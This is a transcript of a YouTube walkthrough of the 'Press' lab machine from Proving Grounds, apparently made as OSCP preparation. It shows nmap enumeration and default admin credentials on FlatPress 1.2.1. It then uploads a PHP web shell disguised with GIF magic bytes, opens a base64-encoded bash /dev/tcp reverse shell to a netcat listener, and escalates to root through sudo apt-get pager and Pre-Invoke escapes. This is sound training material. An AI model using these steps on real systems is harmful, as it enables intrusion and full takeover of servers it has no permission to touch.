What's going on, YouTube? Welcome back to another video. In today's video, we are doing press from Proving Grounds Practice. Now, this was a part of TJ Knowles' OSCP prep, and that's where we're doing it today. Although this was rated as an intermediate level box, this was pretty simple. As long as you know your enumeration and you know a little bit about magic bytes and what they can do to a file, then you should be perfectly good to go. That being said, let's get right into it. So the first thing that we can start off with is going to be an nmap scan. So we can do tac-sc for default scripts, tac-sv to enumerate the versions, tac-v to get some verbose output, and tac-on, put it in a folder called enum, and then call it initial with this IP address. And then we can go ahead and put in the password and get a couple of ports listed. So we have 80 for HTTP, we have SSH on port 22, and we also have 8089, which is, I believe, HTTP as well. But we're going to be able to see that in a second. So let's do enum initial. And then we can see that this is OpenSSH 8.4 on a Debian server, a Debian instance. Then we also have an HTTP server running Apache. We also have another HTTP server, right? Oh, hello, right here, running Apache as well. And so that looks to be about it. I think here we show, yeah, right here, it shows the actual version of Flatpress. We also have the HTTP title of Flatpress, and we have this lugx gaming shop HTML5 template. So it telling us that it's a template sort of makes me draw away from this, although we can go ahead and check it out anyways just to see what's going on. And this looks very similar to a template. We have this right here, which shows us that this is just a normal HTML template of a sort of gaming shop. It seems like there's no actual functionality to this. We can try and query for something, and there's nothing up here. Something that we can check is maybe SQL injection. We could do, this isn't bringing back anything. So at this point, it's not, I don't think that even if we put in a valid SQL injection, like or 1 = 1, and then a comment, it's going to bring back anything. We can try and go to one of these shops, try different things. These are just normal functionality of this template. We can go to the contact us page and see if this actually does anything. And then send message. It doesn't look like it goes anywhere. Let's see. Let's go here. Let's go to the network tab, reload this. And it goes to normal document and contact.html. So it doesn't go anywhere even if we send something. We could do this. We can try this again and see if anything happens. No, nothing. So this is a sort of dead end here. Another thing that we can check is maybe there's a robots.txt. No, there is nothing there. Although there is another web page, remember, on port 8089. So let's go ahead and check that one out, 8089. And we have this Flatpress blog. So this is a sort of, I don't know about CMS. I think it might be a CMS, like a blog type CMS that allows people to just create a website, simple blog website. So there's nothing much here. This is just a sort of template type of blog post once somebody installs Flatpress. Although we can see from the nmap scan that this is version 1.2.1. So what we can do is we could do Flatpress 1.2.1 exploit. If I could spell, that'd be great. And we can see that there is a file upload bypass vulnerability within this. Oh, never mind. Let's try this GitHub page within this application. So let's go ahead and see what this does. So we have the login to the application. Go and exit that. We have the login to the application. Then we have the navigation to the uploader section. And we're okay. So this is basically allowing us to instill a magic byte of a GIF, which is this portion right here at the top, and then just put PHP code right underneath or right within the file, and have it actually execute on the backend server. So this is just a file bypass vulnerability. It's not really checking the extension. It's sort of checking what the file says it is and then going from there on the execution, right? So let's go ahead and try this out and see if this works for us. So we have a login to the admin page right here. We can go ahead and click on that. And we have a username and password. So we can try admin, nothing. We can try admin password. And we get in, awesome. So this is another vulnerability of default credentials. So, but nonetheless, we can go from here. We have an uploader section right here on the top bar. Click on that. And we have a upload functionality here. Cool. So let's go ahead and go back here. And let's create a file called exec.php. And we could do igif8 with a colon like this. And then we can do a normal PHP system call. So underscore request. Oops. This needs to be a $. Then CMD like this. Like that. And so watch this. Now if we do file on exec.php, we can see that this says it's a GIF image. Now if we went back in here and we exited this right here, took this off, saved it, we can see that this is ASCII text. So that is what allows us to upload the file. We could do gif8 like that, save and quit that. And then we can also come over here and see file type magic bytes, list of file signatures, and these are some of the magic bytes that are usable, you know, within these or sort of identifications for different types of files. Let's see if we can find a... So here is the magic bytes for JPEG or JPG. Is there a... There's a PNG. This is a PNG file. Magic byte, not bike. We have text, PS. So these are just a couple of the different things that you can look for when trying to find a sort of bypass for file upload. So that being said, we can come back here, go to upload. We can go to home, go to OSC, machines. We can do... Where are we? Press, exec.php, open, and upload. And it says that the file is uploaded. Awesome. So now we just need to find where this file is located. And how I found this is I did Flatpress file upload media directory. And right here, upload media files in Flatpress. If we scroll down, we can see right here, navigate to FP content images directory, but we don't have to do that. We can just go to FP content like that. And we have a little bit of directory indexing here. And if we go to attachments, we see an exec.php right here. Zoom in a little bit. Exec.php, we can click on that. We have this gif8 thing here, but if we go ahead and pass it this parameter of CMD and ID, we can see that we actually have remote code execution. So what we can do from here is set up a little reverse shell thing. So we can do VI and then shell, and then we can do bash stack I to and dev TCP. and then 9999 for the port, 0, 2, and 1 like that. So then we can come here and I believe going to add 2 spaces here and going to add a space over here. And I believe if we do cat shell and then base 64, tac W0 to do no line wrapping, and then we can do that. Yeah, there we go. We have this base 64 encoded sort of like bash reverse shell. Then we can come back here. Actually, let's just set up this netcat and cat MBLP 9999 and come back here. We can grab this portion up here. We could do echo, paste in the base 64, and then we could do base 64 tac D, and then pipe that to bash, enter, and we can see it hanging. So if we go back to our terminal, we can see that we actually have a reverse shell on the box. So let's go ahead and see if we have Python. So let's do which Python 3. We have Python 3, so we could do Python 3 tac C import p2y p2y.spawn bin bash like that. And then we could do stty raw minus echo and then fg. And then we could do export term equals to x term, clear the screen, and we can start our enumeration. So we can do ID. We are not part of any special groups or anything. We could do SS or SSNLTP to see what services are running on the box. We could see that MySQL is running on the box 3306 and it's running on localhost. We can try and find credentials to that. Let's go to Flatpress. Let's do find dot and then grep for database. Nothing. We can try config. We have a couple of configs here. Admin. Let's see. Let's try DB. Okay, there is something here. Let's see. Docs. No, includes. Those are languages, admin.config.php. Maybe we can try this. Let's cat this. Let's see if we have any database credentials. Doesn't look like it from here. Let's see. Okay, I mean, we can try and run linps on this. Let's just go ahead and run linps, and then it can find all of this sensitive information for us, and that we can utilize to actually get a privilege escalation opportunity, right? Well, one other thing before we do that, we can check is sudo tac L to see our availability or to see our privileges. And we can actually see that we have a privilege here of using apt-get with no password as root. So, I mean, I guess we don't even need to run linps because we can just use this right here. So one of the things that we can do is by default, apt-get uses less, or the like page viewer less, to view the changelog, right? So for example, we can do sudo user bin apt-get, and then let's say changelog apt. It'll open up this, and all we have to do from less, since this is open as root, we can execute a command from here. We can do !bash, and we are root on the box, just like that. So we can do cat, or we can do ls/root, and you can see the proof.txt there. Although there is another thing that we could do, and we can do sudo user bin apt-get, and then we can do update, and we could do tac O, and I believe it's, what is it, apt, what was it? Apt update was something like this. Hold on. We can do, or we can actually go to GTFOBins and see if they have this here, apt-get. Okay, they do. We can go to sudo, and right here we have the same command that we just run, and this one right here. So this is another way to escalate the privileges. Although this, what it does is it basically takes a input, a user input, right? And it does the update or the command that you give it. But before it does that, before it invokes that command, it does this command that you pass it at the end. I probably did not explain that very well, but we can go ahead and grab this. So we can do apt update and then pre-invoke, and I believe it's : equals bin bash. And we can get also root on the box like that. That's another way. But if we exit this, we can see that it is updating the box. So we can try and get out of that, and we can very easily. But yeah, that's pretty much the box. This is another way that you can try and escalate privileges right here also. Although whatever you try and install must not already be installed from here. And then right here, we also have the when the shell exits, the update command is actually executed just like this. Remember exactly what I was saying. Let's see what the -o is for. If we go to apt-get man, like the man pages, we can search for -o. Okay, so it's sort of setting a config and then equal to a string and then just sort of running that config, I assume. Let's go down here, right here. Set a configuration option. This will set an arbitrary configuration option, and the syntax is like this. So that makes sense. That's understandable. And that is basically it. That is the entire box. This was an intermediate box, and I'm assuming because of the upload bypass vulnerability that you sort of had to know how to do that, I guess. But this is practically exactly just doing good enumeration, looking up a vulnerability for the specific version of the software running, and then just replicating these steps. So, I mean, realistically, it wasn't that hard, although it was a good learning opportunity, and I hope you guys enjoyed, and I'll see you guys in the next one.